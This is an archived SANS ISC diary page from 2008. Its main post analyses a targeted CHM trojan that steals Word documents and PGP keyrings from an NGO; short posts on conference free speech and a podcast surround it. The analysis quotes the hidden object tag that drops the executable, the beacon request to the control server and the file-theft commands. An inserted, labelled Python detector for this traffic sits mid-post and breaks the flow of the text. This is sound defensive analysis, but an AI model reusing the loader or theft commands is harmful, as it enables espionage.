
SANS ISC InfoSec Handlers Diary Blog



Freedom of Speech...or not?

Published: 2008-03-27
Last Updated: 2008-03-27 22:33:38 UTC
by Pedro Bueno (Version: 1)
4 comment(s)

When you are in your own country, you know the limits of what you can and cannot say. This is valid for conferences, interviews, etc...

The thing is, when you are going to a foreign country, you may not know what freedom of speech is like there, so it may become quite dangerous if you want to say something about the country that is hosting the event.

I am going to be giving a talk in Hong Kong on a hacking/security topic in the near future. I need to know what would happen if I say that China is a source of a lot of the problems that I see...

Would I be in jail right after the talk? Would I be prosecuted?

I know that Hong Kong has different laws than China itself, but it is definitely a good question, especially for me...;)

Also, if you know of a country where I would also find this kind of problem, please let me know.

-------------------------------------------------------------------------------

Pedro Bueno ( pbueno //&&// isc. sans. org. )

Keywords: china

Guarding the guardians: a story of PGP key ring theft

Published: 2008-03-27
Last Updated: 2008-03-27 17:25:58 UTC
by Maarten Van Horenbeeck (Version: 1)
2 comment(s)

A couple of weeks ago, we received a CHM, or Windows Help file, embedded in an e-mail as part of a targeted attack campaign against an NGO. Virus detection was near zero. On Virustotal.com, two solutions actually flagged it as malicious.

After decompiling the CHM file, which you can easily do using tools such as arCHMage or chmdecompiler, I spotted the following code in the HTML content, in addition to an executable ‘music.exe’:

      <object width="0" height="0" style="display:none;"
      type="application/x-oleobject" codebase="music.exe">

The goal of this code is to load a hidden object from the CHM container. This embedded file was also not recognized by the vast majority of anti-virus vendors. The code connected to a ‘fake’ web server at a Hong Kong ISP, and issued the following request:

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

When you see something like this, it raises the suspicion that the UID is in fact a ‘command’ to a control server. In reality, the web server turned out not to be a web server at all. Any query but the above was answered with an immediate disconnect. In response to the above request, the server replied with a large BASE64 encoded response, which turned out to be an additional executable file. The trojan then executed this file, which was its second-stage payload.

This file subsequently connected to a second server, which was the actual control server. It sent the same registration URI as above to this machine. In return, the server responded with another BASE64 encoded string. This one was much shorter, and once decoded, turned out to be:

      <Command Begin>
      netmgetr usb:\*.doc
      netmgetr usb:\*.pkr
      netmgetr usb:\*.skr
      netlsr usb:\*.*
      <Command End>

Upon further review of the trojan code, netmgetr scans the file system for a filename pattern and then copies the matching files off the system. This is interesting, because reports of malware looking for PGP keyrings (the .skr and .pkr files in the above example) are rare. There have been instances, such as the ’99 Caligula macro-virus, but that was more proof-of-concept code.
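As an added illustration, not part of this diary or of the original analysis, the following Python decodes a BASE64 response of the kind described above, tells a second-stage executable apart from a command block, parses the <Command Begin>/<Command End> format shown, and flags any collection command aimed at PGP keyrings. The sample beacon line and responses are constructed here; the "MZ" header check and the regular expressions are my assumptions about the format, not something taken from the trojan.

```python
import base64
import re

# Constructed sample command block in the format quoted in the diary (not captured traffic).
COMMAND_BLOCK = r"""<Command Begin>
netmgetr usb:\*.doc
netmgetr usb:\*.pkr
netmgetr usb:\*.skr
netlsr usb:\*.*
<Command End>"""
SAMPLE_COMMAND_RESPONSE = base64.b64encode(COMMAND_BLOCK.encode()).decode()
# Constructed sample "second stage": a BASE64 body that is really a PE file (starts with MZ).
SAMPLE_EXE_RESPONSE = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode()

KEYRING_EXTENSIONS = (".pkr", ".skr")  # PGP public and secret keyring files
# Assumed shape of the registration request seen in the diary: GET /scripts/msadce.exe/?UID=... HTTP/1.x
BEACON_RE = re.compile(r"^GET /scripts/msadce\.exe/\?UID=\S+ HTTP/1\.[01]$")
BLOCK_RE = re.compile(r"<Command Begin>\s*(.*?)\s*<Command End>", re.S)


def is_beacon_request(request_line: str) -> bool:
    """Flag an HTTP request line matching the registration pattern from the diary."""
    return bool(BEACON_RE.match(request_line.strip()))


def classify_response(b64_body: str) -> dict:
    """Decode a BASE64 server response and classify it as executable, command block or other."""
    try:
        data = base64.b64decode(b64_body, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return {"kind": "invalid", "commands": []}
    if data.startswith(b"MZ"):  # DOS/PE header: the response is a dropped executable
        return {"kind": "executable", "commands": []}
    match = BLOCK_RE.search(data.decode("latin-1"))
    if not match:
        return {"kind": "unknown", "commands": []}
    commands = []
    for line in match.group(1).splitlines():
        parts = line.strip().split(None, 1)  # "<verb> <path pattern>"
        if len(parts) == 2:
            commands.append((parts[0], parts[1]))
    return {"kind": "commands", "commands": commands}


def targets_keyrings(commands) -> bool:
    """True if any file-collection command asks for PGP keyring files."""
    return any(verb == "netmgetr" and pattern.lower().endswith(KEYRING_EXTENSIONS)
               for verb, pattern in commands)
```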

In this case, the code above was combined with a keylogger, so the passphrase could have been grabbed as well. However, we did not see this happening. It appears the attacker's goal was to “map” who was talking to whom using encryption. In this attack, the latter information appears to have been actively used to send malware to other people in a more convincing way.

There are two things we can learn from this:

  • We should understand that the network that houses our data is not just a network of machines. It’s a network of people. Knowing who talks to whom, and how, is a valuable aid to an attacker in selecting his next targets and making his messages look "normal";
  • When we use strong encryption, attackers will not try to "break" that encryption. They will move to the endpoints to steal the keys that are used to encrypt it. Ensure sufficient security is implemented on key storage.

Cheers,

Maarten Van Horenbeeck
maarten at daemon.be


Internet Storm Center Podcast

Published: 2008-03-27
Last Updated: 2008-03-27 17:25:21 UTC
by Johannes Ullrich (Version: 1)
4 comment(s)
Quick update: The last episode ("Episode 1") was not available as MP3. We had some issues with MP3s initially, but I think it's solved now. Enjoy.

Joel and I got together to record a podcast. We would like to make this a regular feature, and include the monthly threat update webcast. The idea is to create an episode every 2 weeks. One episode each month will be published on "Reboot Wednesday". Another episode would follow 2 weeks later.

At this point, I set up 4 "Episodes":


  • 2 old webcasts (the last two) unchanged.
  • 1 "presentation" with slides about getting started with IPv6
  • and the new "podcast"

At this point, this is a test to see how the different formats work and which format you prefer. The last "episode" is what I think these podcasts will be like in the future. We are very interested in feedback!

(and yes... we know Joel is a bit "soft"... it's hard to get me quiet... I had the microphone running with an attenuator and put it about 3 feet away from me)

Try to search for the podcast in iTunes if you use iTunes (it should be up there... but I haven't found it yet :-( )
iTunes direct URL: http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=276609412 (iTunes hasn't indexed our podcast yet, so you have to use this direct link)
The direct URL for the podcast: http://isc.sans.org/podcast.xml

------
Johannes B. Ullrich Ph.D.
jullrich \a t/ sans.org

Keywords: podcast